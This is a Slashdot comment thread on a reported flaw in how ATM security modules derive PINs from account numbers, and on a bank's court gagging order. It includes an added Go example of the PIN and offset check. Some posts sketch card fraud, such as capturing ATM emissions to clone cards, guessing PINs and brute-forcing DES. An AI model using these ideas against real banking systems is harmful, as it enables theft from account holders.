    Hey you ATM hackers. How much work would it take to make these goddamn things accept a 12 digit pin -- or better still, a passcode.

    And to whomever's about to bring up biometrics: shut up.

    --
    Hey freaks: now you're ju
    1. Re:Well, duh... by Anonymous Coward · · Score: 0

      I'm guessing it's because it's hardware based, not software based.

      To add extra digits, extra circuitry is needed.

      If it were software based then it would be no problem at all.

    2. Re:Well, duh... by cant_get_a_good_nick · · Score: 1

      Citibank allows a 4, 5, or 6 digit PIN. Some networks (most international ones) can't handle anything but 4. Maybe you could get two accounts, one for home, with a 6 digit PIN, and one with 4 digits for international travel, where it's a real restriction. Check with your bank.

  86. MOD UP by dachshund · · Score: 1

    This guy is correct. The vulnerable system is used by banks in the US just as much (or more) as it is in the UK. The idea was to create ATMs that could verify PIN numbers without dialing into a central computer. Very few ATMs do that these days, but the vulnerability remains.

    1. Re:MOD UP by whereiswaldo · · Score: 1

      The idea was to create ATMs that could verify PIN numbers without dialing into a central computer.

      And security professionals thought this up? I sure wouldn't mountain climb with that level of security.

    2. Re:MOD UP by Dudio · · Score: 1

      Of course security professionals didn't think this up. The marketing guys convinced them that nobody would stand for a PIN like {44EC053A-400F-11D0-9DCD-00A0C90391D3}. Remember that PINs have to be simple enough that even PHBs can remember them. This rules out pretty much everything more complicated than the 4-digit numeric we're all used to.

    3. Re:MOD UP by whereiswaldo · · Score: 1

      Remember that PINs have to be simple enough that even PHBs can remember them. This rules out pretty much everything more complicated than the 4-digit numeric we're all used to.

      My point is not that the pins are 4 digits long. It's the fact that they can be calculated from some other hidden number or formula. All one has to do is figure what the other number or formula is and bingo - you've got the person's pin.
      Without going to the server, this is the only way, no? Not terribly secure. But you're probably right - it wasn't a security pro who came up with it.

      BTW - if you generated that GUID from your machine and plan on generating another one tied to your real name, it would be easy for someone to join the two together if they wished to learn your true identity. In case you care. :)

    4. Re:MOD UP by dachshund · · Score: 1
      And security professionals thought this up? I sure wouldn't mountain climb with that level of security.

      Remember that security professionals also thought up the old-style Unix password file. That didn't work out so well in the end, either.

      Whoever invented this was stuck with some pretty unpleasant parameters. The bank wanted machines that could do offline transactions. Probably every qualified security pro said "are you nuts?" But it was the bank's money and they were prepared to risk it.

      There was a big problem back in the 80s with Bank of America, which used to keep bank balances on the magnetic strip. Let me repeat that: bank balances. On the magnetic strip of your ATM card. To give your savings a $5000 boost all you needed was to crack the code and buy a card writer. That was somewhat disastrous for BofA, and pretty much put the nail in the coffin of offline verification. Unfortunately, banks still use the broken crypto system for online verification.

  87. And he's lucky they didn't cuff him... by Anonymous Coward · · Score: 0

    cuz he's clearly a thief.

  88. RTFA! by Anonymous Coward · · Score: 0

    DMCA? Who said anything about the DMCA? The article is about a British bank trying to keep information about ATM vulnerabilities in a British court case secret.

    And who was the idiot who modded this insightful? Geez, seems like all you have to do to get positive karma these days is to say something negative about DMCA.

    1. Re:RTFA! by grimarr · · Score: 2, Interesting
      Just because the article didn't mention the DMCA, doesn't mean it can't be relevant. Sure this was an article about British events. His point was that if it was an American bank, and American people discovered the flaw, the banks (or the government) could use the DMCA to prevent them from telling people.

      Yeah, I know that the DMCA is supposed to be about preventing illegal copying, but it gets stretched WAY beyond that sometimes. Maybe the banks would claim that the encrypted data in the ATM was copyrighted....

  89. Copy paste the link in your browser by Anonymous Coward · · Score: 0

    The site is up and running fast. They're just blocking URLs with an external referrer.

  90. Pin numbers aren't secure by estoll · · Score: 1, Interesting

    I know a guy whose brother writes software for POS terminals that you use at gas pumps. He says if you choose the "debit card" payment option, your PIN number is transmitted in plain text over the Internet.

    --
    http://www.askthevoid.com
    1. Re:Pin numbers aren't secure by sulli · · Score: 1

      POS indeed!

      --

      sulli
      RTFJ.
    2. Re:Pin numbers aren't secure by /dev/trash · · Score: 1

      What the hell is a Personal Identification Number number.

      read the subject closely

  91. Re:Wouldn't have happened.... by Anonymous Coward · · Score: 0

    The absence of an action does not make such action impossible. To think otherwise is very ego-maniacal.

    Wow. I couldn't agree more.

    However, this theory isn't readily applied to all the Linux zealots we have here, now is it? Double standard maybe?

  92. The real threat by goombah99 · · Score: 4, Insightful
    After pondering this some I have come to the conclusion that this is a real threat. At first I dismissed it because it was going to take a bank employee with access to programming the machines' low level inputs, plus a very large list of card numbers, plus access to the PIN offsets, plus a way to launder the money, plus the ability to make 15 tries without losing the card or having to override the system (which would get noticed).

    But then I thought, well, where could you do this and not get caught? How about North Korea or Nigeria. North Korea already mints high tech counterfeit US 100 dollar bills on government printing presses. So this would be small but useful potatoes.

    But more important than the money, it also would make a nice weapon: UN provokes N. Korea, N. Korea dumps 100,000 cards with PINs written on them in, say, the NY subway system. Next day all ATM banking is halted world wide. Nice little panic. Travelers stranded. Runs on banks as people have to now go inside to get money and they run out of cash. Anyhow you get the idea.

    Or maybe just one of the millions of merchant accounts Visa hands out is owned by ..... well, you name it.
    Yikes

    --
    Some drink at the fountain of knowledge. Others just gargle.
    1. Re:The real threat by Anonymous Coward · · Score: 0

      If this holds true for interac machines as well, it is worse than you think. Pretty much anyone can get hold of an interac terminal. As for card numbers, you just need to clean out the garbage bin at any ATM.

    2. Re:The real threat by njdj · · Score: 1

      at first I dismissed it because it was going to take a bank employee with access to programming the machines low level inputs, plus a Very large list of card numbers, plus access to the pin offsets, plus a way to launder the money

      Do you have any idea how many low-paid bank employees there are in rich countries? Obviously not. Have you read Kevin Mitnick's book about the ease of deception? Obviously not. Very large lists of card numbers are routinely stolen from merchants (read the news).
      Forget about North Korea and Nigeria, most of this fraud will be done right here.

    3. Re:The real threat by Anonymous Coward · · Score: 0

      No, each bank verifies its own PINs. Other countries' banks can't. This attack won't work at all.

  93. most amusing + more links by alaric_uk · · Score: 2, Informative

    First off it might be appropriate to link to Mike Bond's site, where he's tracking some of the news articles about his research, and it has unicycle jousting photos. Also of interest may be Ross Anderson's site.

    When Ross mentioned the case and the gagging order in a software engineering lecture he was giving on Thursday I was amused... but I didn't expect all this. What I think is most amusing is the fact that if Citibank hadn't taken the pretty rash decision to pursue litigation rather than investigate it internally and fix the vuln quietly, then they wouldn't look anywhere near as foolish!

    I think that's probably enough for my first post, but I'd just like to say that I expect the software engineering lecture with Ross Anderson tomorrow will be most amusing.

    Ross: 1
    Citibank: 0

    Alaric.

  94. MODUP! by Anonymous Coward · · Score: 0

    MOD PARENT UP

  95. m$ wants sites to stay unavailable by klparrot · · Score: 2, Funny
    Click the Refresh button, or try again later.

    Gotta love how when the server gets too busy, it suggests you keep hammering it. :)

  96. Why changing you pin does not matter by Anonymous Coward · · Score: 0

    READ THE THREAD YOU ARE REPLYING TO, it's explained in the grandparent post.

    Your base PIN is fixed and unchanging.
    They use a public offset to create a changeable PIN. Changing your PIN only changes the offset, not the base PIN.

    Example: your base PIN is 1234, but you want your PIN to be 5555.
    Citibank just publishes a PIN offset of 4321 for you.

    When you use your card and type in 5555, the machine looks up the public offset for you, subtracts off the offset (4321) and then compares the result 1234 to the PIN encoded by the account number. If it matches you get the money.

    Publishing the offset does not reveal the base PIN, so it's not considered a security risk. When you change your PIN, the base PIN number never changes, only the public offset.

    1. Re:Why changing you pin does not matter by vaguelyamused · · Score: 1

      Why did this get modded down to 0 when the posters above it obviously didn't take time to read the original post. Yet they end up with +1 and +2 and this guy, who actually read the article and explains it in VERY SIMPLE TERMS for the above morons gets modded down.

      --
      STOP ROCK VIDEO
    2. Re:Why changing you pin does not matter by Anonymous Coward · · Score: 0

      He didn't get modded down.
      ACs start at 0.

  97. counting money in front of the camera is no proof by klparrot · · Score: 1
    Now I always count it in front of the camera so if there is a problem I've got proof.

    What proof? You could easily withdraw a hundred dollars, then show the stack front-on to the camera and claim you only got twenty. There's no proof there.

  98. Question (from the vulnerability report) by giminy · · Score: 2, Informative

    Quoth the report:

    "However, HSMs [Hardware Security Modules] implementing several common PIN generation methods have a flaw. The first ATMs were IBM 3624s, introduced widely in the US in around 1980, and most PIN generation methods are based upon their approach. They calculate the customer's original PIN by encrypting the account number printed on the front of the customer's card with a secret DES key called a 'PIN generation key'."

    Weird. So they're talking about _generated_ PINs. Every bank account I've opened in the last 7 years, I've been able to request my PIN. And if I wanted to change it, I request what to change it to. Does any bank actually still use this method?

    I'm a wee bit confused....

    --
    The Right Reverend K. Reid Wightman,
    1. Re:Question (from the vulnerability report) by Beryllium+Sphere(tm) · · Score: 3, Informative

      The system stores an offset which is the difference between your chosen PIN and the calculated PIN.
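
    The offset scheme explained in post 96 and in the report excerpt quoted in post 98, worked through as an added Go example (not the report's or any bank's code). Single DES under a PIN generation key and the digit-wise public offset follow the text; the decimalisation table, the validation-data layout, the sample key and the PAN are constructed assumptions.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Position i holds the decimal digit assigned to hex digit i. "0123456789012345"
// is the commonly cited default table; an assumption here, not a bank's setting.
const decimalisationTable = "0123456789012345"

// naturalPIN is the fixed "base PIN" of an account: DES-encrypt validation data
// built from the PAN under the PIN generation key, decimalise, keep pinLen digits.
func naturalPIN(pgk []byte, pan string, pinLen int) (string, error) {
	if pinLen < 4 || pinLen > 16 {
		return "", fmt.Errorf("unsupported PIN length %d", pinLen)
	}
	// Validation data layout is a bank parameter; assumed here: rightmost 16 PAN digits, 'F'-padded.
	if len(pan) > 16 {
		pan = pan[len(pan)-16:]
	}
	block, err := hex.DecodeString(pan + strings.Repeat("F", 16-len(pan)))
	if err != nil {
		return "", err
	}
	c, err := des.NewCipher(pgk) // single DES, 8-byte key, as the report describes
	if err != nil {
		return "", err
	}
	ct := make([]byte, des.BlockSize)
	c.Encrypt(ct, block)
	out := make([]byte, pinLen)
	for i := range out {
		nibble := ct[i/2] >> 4 // high nibble for even i, low nibble for odd i
		if i%2 == 1 {
			nibble = ct[i/2] & 0x0F
		}
		out[i] = decimalisationTable[nibble]
	}
	return string(out), nil
}

// digitwiseSub removes an offset from a PIN: digit by digit modulo 10, no carries.
func digitwiseSub(a, b string) (string, error) {
	if len(a) != len(b) || strings.Trim(a+b, "0123456789") != "" {
		return "", fmt.Errorf("bad digit strings %q, %q", a, b)
	}
	out := make([]byte, len(a))
	for i := range out {
		out[i] = '0' + (a[i]-'0'+10-(b[i]-'0'))%10
	}
	return string(out), nil
}

// offsetFor is what a PIN "change" really does: the natural PIN stays fixed, only the public offset is rewritten.
func offsetFor(pgk []byte, pan, chosenPIN string) (string, error) {
	nat, err := naturalPIN(pgk, pan, len(chosenPIN))
	if err != nil {
		return "", err
	}
	return digitwiseSub(chosenPIN, nat)
}

// verifyPIN is the HSM-side check: strip the offset, then compare with the regenerated natural PIN.
func verifyPIN(pgk []byte, pan, entered, offset string) (bool, error) {
	nat, err := naturalPIN(pgk, pan, len(entered))
	if err != nil {
		return false, err
	}
	base, err := digitwiseSub(entered, offset)
	if err != nil {
		return false, err
	}
	return base == nat, nil
}

func main() {
	pgk, pan := []byte("PGKEY001"), "4000123456789010" // constructed sample key and PAN
	off, _ := offsetFor(pgk, pan, "5555")
	ok, _ := verifyPIN(pgk, pan, "5555", off)
	fmt.Println("offset for chosen PIN 5555:", off, "verify:", ok)
}
```

    Running it with a second chosen PIN shows the natural PIN unchanged and only the offset moving, which is why the thread says publishing the offset costs nothing but a PIN change buys nothing against an attack on the base PIN.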

  99. canadian banks allow longer pins by klparrot · · Score: 1
    How secure can a number that can't be more than 4 digits long BE?

    My PIN is 6 digits; I'm not sure if I was limited to 6 or 8. I'm Canadian, so maybe it's just our banks that allow longer PINs. Nonetheless, I've been able to use my bank card with 6-digit PIN in the States without any trouble.

  100. Re:counting money in front of the camera is no pro by shotgunefx · · Score: 1

    But I don't. I count it out so as not to obscure it. Does it guarantee me anything? No. But it helps. Or it did in the one case I had a problem. (Or maybe because it was only short $20 they just said fuck it.)

    --

    -William Shatner can be neither created nor destroyed.
  101. Windows and crashing by t_allardyce · · Score: 0, Offtopic

    Nothing to do with crypto, but I'm worried. I've heard of a lot of ATMs using systems such as... Windows. I saw a shutdown screen from Windows NT4 on a NatWest cash machine too. What happens if I withdraw money and, after making the transaction with the bank, the ATM crashes without giving me my money?

    --
    This comment does not represent the views or opinions of the user.
  102. Was Your Show in R.I. ? by Anonymous Coward · · Score: 0

    Are you the roadie who was in charge of the fireworks at your show in R.I., the band being Great White I think?

  103. Re:Article got /.ed. Text of the article below: by Anonymous Coward · · Score: 0

    Yeah, sure, it was slashdotted. I guess you don't have to fool all of the moderators all of the time, just some of the moderators some of the time.

    Hope someone with some sense gets some points and mods you into oblivion... Whore.

    P.S. Mods, If it's not AC, and not truly slashdotted (try checking the links first, even if you can't be bothered to read the article), then it's redundant.

  104. WinATM... by zanderredux · · Score: 1

    Someone ought to make a military-grade ATM programmed in Ada someday. Or not?

  105. Re:counting money in front of the camera is no pro by cardshark2001 · · Score: 1
    But I don't. I count it out so as not to obscure it. Does it guarantee me anything? No. But it helps. Or it did in the one case I had a problem. (Or maybe because it was only short $20 they just said fuck it.)

    I consider it more likely that they knew how much money should be in the ATM, and there was extra at the end of the day....

    --
    WWJD? JWRTFA!
  106. Not surprising by j_kenpo · · Score: 3, Interesting

    This is not very surprising at all. Having worked for Citibank, I can vouch for their poor security and joke of an ethical hack process. I'm not surprised that their ATMs' (Global CATS is what they are called internally) encryption scheme for PIN numbers is poor. If I remember correctly, it's actually a VB app on a PC. The goal of the ATM was focused more on ease of use and accessibility, or so the training would lead you to believe. I'm not exactly sure what the process is in the Branches for PIN assignment, but with the cluelessness of their CGTI (Citigroup Technical Infrastructure) and their development team, I wouldn't be surprised if these boxes were more vulnerable to other attacks. There used to be sites like citibanksucks.com and shitibank.com (I don't think they are still around, I think they were "silenced") that used to point out flaws in Citi's systems. They aren't the first to sweep bad press under the rug though.

    1. Re:Not surprising by Anonymous Coward · · Score: 0

      You don't remember correctly.
      In fact, it would have been good if you had read the article before babbling.

    2. Re:Not surprising by j_kenpo · · Score: 1

      No, I think I do remember correctly. The article is a criticism of the Racal RG7000 series and various other HSM modules that are supposed to be plug-in-and-go security for various ATMs (not just Citibank's CATS systems). This is independent of the software that runs the actual interface, hence an excerpt from Racal's RG7000 brochure: "you can just plug this unit without changes to existing software". Oh well, sucks to be a troll, doesn't it...

  107. Re:in case of /. by L7_ · · Score: 1

    Ctrl-A, Ctrl-C, Ctrl-V

    automatic 2+ informative

  108. Webserver seems to be down - new links by sjmurdoch · · Score: 1
    The Computer Laboratory webserver (www.cl.cam.ac.uk) seems to be down for unknown reasons.

    Mike Bond has made a temporary webpage. The paper on the attack (UCAM-CL-TR-560) is also duplicated.

    These URLs are just temporary until the webserver is back up so could disappear at any time.

    --
    Steven Murdoch.
    web: http://www.cl.cam.ac.uk/users/sjm217/
  109. 4 digits anyway by Darth_Burrito · · Score: 2, Interesting

    Alright, I realize this is "different" but ... come on ... how much can we complain about the secrecy of a 4 digit number? There's only 10,000 different combinations. What pisses me off is my bank uses the PIN numbers for your online banking password and they use your frickin social security number as the username. You get 3 tries on every account. So how hard is that to automate a hack?

    How many morons we got on this ship?

  110. Why bother to crack it when you can just read it? by Anonymous Coward · · Score: 2, Interesting

    Nobody ever bothers to mention the fact that ATM machines are electromagnetically insecure. They aren't RF shielded worth doodle and any reasonably competent spook can capture all of the details of any transaction from across a parking lot. Find a bank with some outside ATMs, park a van with some affordable electronics a hundred or so feet away, spend a few hours capturing data, encode the magnetic strips on a few blank cards using different and still affordable electronics, write the PIN numbers on each card, wait a few days so that everybody forgets seeing your van, travel a few miles to another ATM, and then start withdrawing cash. Move to another ATM and repeat. A couple of hundred bucks 40 or 50 times a day for three or four days adds up to serious cash quickly and probably before anybody notices. Burn the cards and return to step one.

  111. Old version of the new scheme? by thogard · · Score: 1

    The interesting thing about this attack is that it's very much like an attack against most smart cards except that they lock out after 3 to 5 tries. If you have access to a point of sale network that uses lots of smart cards (say a large food store) and you can keep track of people who come in often and don't get their PIN number wrong then you can try 2 guesses per visit. The interesting bit is that once you have the PIN code and account number, you can program your own chip card for about $10 if your bank is nice enough to send you your very own chip card writer.

  112. Shucks paw!! by Anonymous Coward · · Score: 0

    Shucks! I never DID think we can trust these newfangled things...

  113. Re:Sounds like mastermind by Leeji · · Score: 1

    Wow, sounds exactly like a game of Mastermind. But instead, you only get the "right color, maybe right place" pegs back.

    --
    It all goes downhill from first post ...
  114. Related question: anyone else had $ just vanish? by jonskerr · · Score: 1

    I opened an account with a local bank which recently got bought out by M&I Bank; over the course of a year or two there were several occasions where I suddenly got overdraft notices. Now those are by their nature always a surprise, and I hadn't gone through my statements like I should've for several months and it turned out a statement was missing. When it finally turned up, I went through the entire account from the beginning and found math errors of around a dollar, and nothing that was on the statement that wasn't in my register.

    No other account in the 20 yrs I've been banking has ever done this. There was always a reason. And I'm not in the habit of writing checks days before the money will be in there. I concluded there's a problem in the fundamental code running that bank. I want to ask the Slashdot community is this possible? Anyone had similar experiences? Am I just screwed out of the money? It's around $400 now, and I've let the account die, but they're threatening me with collections, and I'd like to not have it affect my credit either.

    --
    O~ Him that studies revenge keeps his own wounds green. -- Francis Bacon
  115. But it is by alexo · · Score: 1

    When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.

    Stop being so damn literal!

    The "insightful" moderation need not apply only to the content of a post. It may apply, as I believe was this case, to the fact that it was posted in this context. Sort of "meta insightful".

  116. Not true... by Anonymous Coward · · Score: 0

    In debit-capable equipment, the PIN is encrypted immediately within the keypad itself, a sealed assembly - that heavy PIN pad the cashier hands you that feels like a block of epoxy - it is. In the real POS world (those systems certified to directly connect to financial networks - not the Internet), no provision is made for the systems to self-verify the PIN like the teller machines described in the attack, hence they lack that vulnerability. PIN verification is the responsibility of the network. If the network is down, so is the service.

  117. Re:Article got /.ed. Text of the article below: by Anonymous Coward · · Score: 0

    eat my -1 the-server-is-fast-for-me (redundant) moderation, you karma whore.

  118. Another Citibank coverup by Anonymous Coward · · Score: 0

    Didn't Citibank learn anything from the Russians hacking their systems? Fah, I hate corporate subcultures. They're more subversive than anything Ashcroft can put forward.

    Rick

  119. You know what sucks about this? by PotatoHead · · Score: 3, Insightful

    Is that you can do nothing about it!

    The bank's current position is that everything works fine. After all, they do handle the world economy every day, so your little small potatoes checking account is no big deal, right?

    Unless you can demonstrate a bank error that meets their criteria I might add, the bank basically says you must pay all fees like it or not.

    So, let me tell you from experience, you are screwed. Either you pay even though you may not be totally in the wrong, or you don't.

    If you pay, you will be out some cash, but the bank will be happy to let you continue doing business and will even screw you again later if you are willing.

    If you don't pay, it gets worse. They charge off your account so they can get the tax benefit. They still send you to collections, and they report you to ChexSystems. This database will record your debt to your current bank and will be used as the reason you cannot get new accounts elsewhere. 95% of all banks use this. Getting a record removed is very difficult. The worst part is that even if you pay at this stage, your record will last for 7 years.

    Big banks really suck right now. There are only a few laws they must follow, the rest are rules and regulations they get to set for us without our feedback. Big banks are greedy and are making more money each year. They charge fees for almost anything and have no reasonable appeal process. Currently the larger banks are even beginning to charge check cashing fees on their own checks!

    You could write me a check for $5.00 and it could be worth nothing if I presented to the bank it was drafted on.

    My advice to you would be to pay that bank, and realize that (1) you have no power here. --Trust me I tried hard to work through a problem with my bank and could not and (2) big banks are not working in your best interests.

    Keep your banking record clean and look for a smaller bank that actually wants your business and will serve you as needed to keep it.

    Things to look for:

    - Low fees across the board.

    - Daily caps on overdraft charges to prevent cascading fees. (This is what happened to me. $300 turned into $1100 in a couple of days !?!)

    - Teller access without fees

    - Reasonable ATM policy. No double dipping ATM transactions. Some bigger banks can and do charge you for use of a free ATM even though the ATM owner does not!

    For those wondering, the banks that I have found particularly nasty are:

    US Bank

    Beginning to impose check cashing fees, highest overdraft charge with no daily cap, poor deposit policy. They hold every check they can for three days. Their own tellers advise you to cash your check then deposit cash.

    Key Bank

    Very strict on transaction type. Will freeze accounts for very little reason. A disagreement with a teller is enough for this. Check cashing fees with no daily cap. Poor deposit policy combined with their allowed transaction types make some common deposits very difficult.

    Both banks guilty of transaction ordering with intent to charge fees. Basically they will clear large checks in order to let many smaller ones bounce. They say it is for your own good, but realistically which is better? Personally, I would rather reissue the larger check, pay the fees and use the rest of my money to cover the damage as cheap as I can. You decide.

    Both banks guilty of issuing dangerous check cards by default. Check card works like credit, but with none of the protections.

    All this talk of PIN theft is one thing, losing one of these cards is way worse. They can use it any number of places without a PIN and you have to pay.

    Personally, the errors are likely to be unstated fees for transactions. Many places charge a fee when you use a debit card. Not all of them let you know about it even though they should. Another error comes from charges when you pay for dinner out. Remember the little place on the receipt for tips? If you don't fill it out, they can later. Problem here is that you don't always get to see the amount they key into the little visa machine. Your copy says one thing, theirs says another.

    Seriously, if you are banking with a larger bank, ditch it and go shopping and tell your friends when you are done. You will be better for it.

  120. One other thing I forgot by PotatoHead · · Score: 3, Interesting

    In the last few years reports have been written about ways banks can increase revenue. In the early 90's the easiest way was to increase fees.

    There are consultants that will analyze a bank's customer transaction histories in order to recommend a fee structure that will retain the highest number of customers and generate the most revenue from fees while lowering costs.

    They do this with the teller fee, minimum balance fee, account inactivity fee and the overdraft fee.

    Recently the check cashing fee was added to make money on both the check writer and the casher while discouraging face to face business at the bank, which lowers costs.

    The high growth of bank profits combined with growing negative public perception of the fees has recently sparked a few recommendations toward more reasonable structures that actually do help people and the bank without so much profit.

    Try and find a couple of those. They get almost zero notice.

    See how it works? Remember that the next time you read a shiny well produced brochure that 'assures' you that no other bank is working harder for you.

  121. You might be surprised in to know by abhisarda · · Score: 1
    that in India, there are many ATMs (not all) that do not connect to the main server when you withdraw money.

    There are many people here who have withdrawn 5000 Rs (100 $) a day for days together even when the balance in their checking account was less than 100 $ in the first place. If you have overdrawn your account, you are sent a mail (snail) or the bank gives you a call to collect the money. The time limit in which you withdraw money without any problem is 3 days to 15 days.

    That is why some banks here give credit/debit cards only to customers who have had a 100 $ minimum balance over a period of 2 years.
  122. See, it's those damn OS/2 16-bit programmers by Anonymous Coward · · Score: 0

    See, it's those damn OS/2 16-bit programmers. Good for nothings.

  123. Re:ATM? (pic)! by Anonymous Coward · · Score: 0

    A bit off-topic, but here's a train timetable board running Windows. The trains in Paris were three or four hours late that day. I wonder why ;)

    http://sinex.hut.mediapoli.com/juhapics/slide.cgi?dir=Ranska&pic=7

  124. Looks like... by Anonymous Coward · · Score: 0

    ..the problem is that the ATM needs to at the very least verify that the PIN is right irrespective of whether it is online or offline with the bank database. Therefore the offsets need to be present for each account number at every ATM point. The entire paper is based on a bank employee having access to change the code and insert his keyset for mapping to find out which numbers form part of the key.
    As it is, whether it is a four, five or six digit PIN doesn't matter if a bank employee has access to the system.
    If an ATM cannot be online with the bank database, is there a need to verify the PIN? Isn't that an inherent security risk?

  125. This is the result of CRUDDY analysis of security by Anonymous Coward · · Score: 0

    It should have been clear from the beginning that when you put thousands of copies of a system master key out in the field, it would eventually be compromised. The sad thing is that this crack means accounts can be compromised by faking cards without even the thieves having to have a real card. If for example some other secret were on the key and used as part of what got used to generate the PIN, then at least the real ATM cards would be needed also in stealing money from an account. This need not be fancy. Another secret key, unknown to the ATM, could be used and one or a few digits of a crypt of an acct number with that key stored on the card. Getting fancy with public/private keys to private-crypt a pin and storing it on card isn't necessary (even if there were room which there isn't).

    It has been a basic tenet of security that you don't trust information that is placed in untrustworthy places, and there have been plenty of articles about people analyzing "secure" hardware modules given time. All it would take is some period where a store that has an ATM in it is closed for long enough to open up the ATM, get the bits out, run analysis, and perhaps even put them back. In all these years since ATMs were first released something of the kind must have happened, to generate the bogus charges that are now taking place.

    It is probably feasible to do a remedy by using a character or two in the magnetic stripe, but it would mean at least that the ability of every ATM that is now able to work without connecting to the card issuer bank to do that would be lost. I suspect that the ability of these machines to function when they WERE connected might be salvageable, though, which would mean most ATMs would be flaky a bit oftener but could still work. The main problem is that for something to depend on a secret on the ATM card magstripe, all the ATM CARDS would have to be replaced. If you get a new ATM card from your bank, you will know this is possible. I suspect too that not all banks will have done anything this dumb. If they had it would suggest that every ATM would be a bonanza with secret keys for multiple bank systems, or that entire networks of banks all used the same key...another egregious security misdesign. The principles have been around at least as long as before the Orange Book came out (check the old literature!) and even with the attempts at crypto control that went way back too, banking was understood to need decent crypto and was always allowed to do it right. Banks that did this are victims of their own stupidity (or perhaps it should be said, victims of the stupidity or unwillingness to read about the subject of some employees who may by this time be long retired or dead; I can't believe anyone today would make this mistake.)

  126. Re:PINs can't work, only RSA will do. Nope, hashes by Anonymous Coward · · Score: 0

    If they'd ask for the password/pin before issuing the card (or at least, before writing the magnetic stripe stuff) they could just do a crypto hash of the password and store that, possibly with a salt based on something like card number. It works in computers. Why not on cards? Also then the thing could be a bit longer without having to store the whole thing. If you really got stuck and could store only half the hash on the card, well, that would probably work better than the current system.

  127. history repeats itself by Hubert_Shrump · · Score: 1

    Ross Anderson talks about this (here) having happened sometime in the 80's when ATMs were first launched in the UK - and how the banks 'conspired' together to keep videocams out of the ATMs so that these phantom withdrawals could be foisted off as 'forgetfulness' on the customer's part.

    Interesting book -- ~1 typo per page, though. Burns the eyes of an English Major.

    --
    Keep your packets off my GNU/Girlfriend!
  128. ATMs in malls and convenience stores swipe only by Anonymous Coward · · Score: 0

    The ATMs in convenience stores in the Philadelphia area at least, and in malls, just have you swipe the card. They do not accept deposits but do give money and some of them, balance inquiry replies.

  129. single DES? by karlm · · Score: 1
    Umm... how often do they change the DES key?

    10 Free Checking accounts with ATM cards ... $0
    1000 FPGAs at 200 MHz ... $5,000
    Beer and Pizza for 100 all-nighters ... $1,000
    Everyone's PINs... priceless
    Some things money can't buy, for everything else there's CitiBank.

    --
    Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
  130. Re:counting money in front of the camera is no pro by Rob+Parkhill · · Score: 1

    Yup, that's pretty much what they do. I had an ATM short me over $100 once (it crapped out while spitting out the cash), and the bank was up-front and told me that if there was $X too much in the machine at the end of the day, they would credit my account. There was, and they did.

    --
    "Tomorrow's forecast: a few sprinkles of genius with a chance of doom!" - Stewie Griffin
  131. that was about as funny... by Anonymous Coward · · Score: 0

    ...as a truck-load of dead babies

  132. Having a secure verification is simple by Anonymous Coward · · Score: 0

    At least it is simple if you have some space to store things.

    Consider: suppose you want a system with no system wide r/w keys anywhere in the field.

    If you encrypt a secret key with a private RSA key and put this on each card, at the ATM you could use the public RSA key to decrypt the secret key and use that to store secret-key-encrypted stuff on the card. Encrypt the card number with the private key and store that too, and you can check the card is valid. But you need more magstripe tracks or other storage. Make sure every card has different secret keys and there's no global key anywhere except where you make them. Someone can still record the data though, but can't generate it from nothing unless he/she can get to the data at the manufacturing site. However this is useless against data recording devices that record cards.

    People recording valid cards and playing them back cannot be stopped so simply; that requires something more involved than a simple data store and may not be solvable at all by simple designs. The storage in normal atm or credit cards is way too small for this kind of trick, and simple storage can be simply copied, cleartext or not. If someone used the crock above, a valid card could still be jiggered even w/o a global symmetric key.

  133. Last Post! by alpg · · Score: 0

    Bypasses are devices that allow some people to dash from point A to
    point B very fast while other people dash from point B to point A very
    fast. People living at point C, being a point directly in between, are
    often given to wonder what's so great about point A that so many people
    from point B are so keen to get there and what's so great about point B
    that so many people from point A are so keen to get there. They often
    wish that people would just once and for all work out where the hell
    they wanted to be.
    -- Douglas Adams, "The Hitchhiker's Guide to the Galaxy"

    - this post brought to you by the Automated Last Post Generator...